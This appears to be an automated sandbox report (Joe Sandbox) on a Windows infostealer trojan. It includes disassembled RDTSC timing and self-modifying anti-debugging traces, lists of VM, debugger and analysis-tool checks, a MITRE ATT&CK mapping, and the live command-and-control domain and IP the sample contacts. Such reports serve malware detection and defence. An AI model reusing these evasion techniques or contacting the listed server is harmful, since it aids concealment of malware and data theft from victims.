Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FFA second address: 71210A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lock cmpxchg dword ptr [edx], ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBCB0ED6604h 0x00000012 sub ecx, 1F725098h 0x00000018 jmp 00007FBCB0ED65FBh 0x0000001d popfd 0x0000001e mov ecx, 2C78C64Fh 0x00000023 popad 0x00000024 pop edi 0x00000025 jmp 00007FBCB0ED6602h 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d mov cx, 240Dh 0x00000031 mov dl, ch 0x00000033 popad 0x00000034 jne 00007FBD21294C82h 0x0000003a jmp 00007FBCB0ED6605h 0x0000003f mov edx, dword ptr [ebp+08h] 0x00000042 jmp 00007FBCB0ED65FEh 0x00000047 mov eax, dword ptr [esi] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FBCB0ED65FDh 0x00000052 or cx, 08F6h 0x00000057 jmp 00007FBCB0ED6601h 0x0000005c popfd 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71210A8 second address: 71210AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71210AD second address: 7121128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c mov esi, 5BCE57EBh 0x00000011 pushfd 0x00000012 jmp 00007FBCB0ED6600h 0x00000017 sbb ah, 00000078h 0x0000001a jmp 00007FBCB0ED65FBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+04h] 0x00000024 jmp 00007FBCB0ED6606h 0x00000029 mov dword ptr [edx+04h], eax 0x0000002c jmp 00007FBCB0ED6600h 0x00000031 mov eax, dword ptr [esi+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push edx 0x00000038 pop esi 0x00000039 mov bh, 54h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121128 second address: 7121159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FBCB0E4CF76h 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121159 second address: 712115D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712115D second address: 7121163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121163 second address: 71211B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e jmp 00007FBCB0ED6608h 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 jmp 00007FBCB0ED6600h 0x0000001b mov dword ptr [edx+10h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBCB0ED6607h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71212DB second address: 71213B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FBCB0E4CF6Ch 0x00000014 jmp 00007FBCB0E4CF75h 0x00000019 popfd 0x0000001a movzx ecx, bx 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+24h] 0x00000022 jmp 00007FBCB0E4CF76h 0x00000027 mov dword ptr [edx+24h], eax 0x0000002a jmp 00007FBCB0E4CF70h 0x0000002f mov eax, dword ptr [esi+28h] 0x00000032 pushad 0x00000033 call 00007FBCB0E4CF6Eh 0x00000038 mov ecx, 1B7327A1h 0x0000003d pop eax 0x0000003e push edi 0x0000003f pushfd 0x00000040 jmp 00007FBCB0E4CF6Ah 0x00000045 adc esi, 7A848F38h 0x0000004b jmp 00007FBCB0E4CF6Bh 0x00000050 popfd 0x00000051 pop esi 0x00000052 popad 0x00000053 mov dword ptr [edx+28h], eax 0x00000056 jmp 00007FBCB0E4CF6Fh 0x0000005b mov ecx, dword ptr [esi+2Ch] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FBCB0E4CF75h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71213B4 second address: 71213DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FBCB0ED6603h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+2Ch], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, 052BEB27h 0x0000001a mov ebx, esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71213DF second address: 712140F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBCB0E4CF6Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712140F second address: 712145C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FBCB0ED6607h 0x00000018 and si, 3F2Eh 0x0000001d jmp 00007FBCB0ED6609h 0x00000022 popfd 0x00000023 movzx ecx, dx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712145C second address: 7121479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712152C second address: 7121530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121530 second address: 7121536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121536 second address: 712156B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBCB0ED6607h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712156B second address: 712159F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 add ax, 3ADEh 0x0000000e jmp 00007FBCB0E4CF79h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712159F second address: 71215B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 mov esi, 2E2D28F9h 0x0000000e mov cl, 5Bh 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7110889 second address: 7110890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, ADh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7110890 second address: 71108A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, 641Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71108A4 second address: 71108A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71108A8 second address: 71108AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71108AC second address: 71108B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71108B2 second address: 71108C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6601h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B0975 second address: 70B0990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FBCB0E4CF6Eh 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B0990 second address: 70B0996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B0996 second address: 70B099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B099C second address: 70B09A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B09A0 second address: 70B09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B09B0 second address: 70B09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B09B6 second address: 70B09C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov cx, C07Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B09C8 second address: 70B09CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 70B09CF second address: 70B09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSpecial instruction interceptor: First address: AA19BC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSpecial instruction interceptor: First address: C47BAD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSpecial instruction interceptor: First address: A9F0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSpecial instruction interceptor: First address: CD6885 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_005A9980 rdtsc 0_2_005A9980
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003C29FF
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: PqHnYMj5eF.exe, PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: PqHnYMj5eF.exeBinary or memory string: Hyper-V RAW
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: PqHnYMj5eF.exe, 00000000.00000003.1473376071.000000000183D000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1473426968.000000000184B000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494800795.000000000184C000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1473259309.0000000001830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhe
Source: PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: PqHnYMj5eF.exe, 00000000.00000003.1332343712.00000000017E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile opened: NTICE
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile opened: SICE
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_005A9980 rdtsc 0_2_005A9980
Source: PqHnYMj5eF.exe, PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49710 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PqHnYMj5eF.exe47%ReversingLabsWin32.Trojan.Generic
PqHnYMj5eF.exe32%VirustotalBrowse
PqHnYMj5eF.exe100%AviraTR/Crypt.TPM.Gen
PqHnYMj5eF.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiN0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686269630%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiNPqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://curl.se/docs/hsts.htmlPqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://html4/loose.dtdPqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#PqHnYMj5eF.exefalse
              		high
              https://httpbin.org/ipbeforePqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlPqHnYMj5eF.exe, PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.html#PqHnYMj5eF.exefalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSPqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/alt-svc.htmlPqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.cssPqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.jpgPqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          5.101.3.217
                          		home.fiveth5ht.topRussian Federation
                          		34665PINDC-ASRUfalse
                          3.218.7.103
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581243
                          Start date and time:2024-12-27 09:01:01 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:PqHnYMj5eF.exe
                          renamed because original name is a hash value
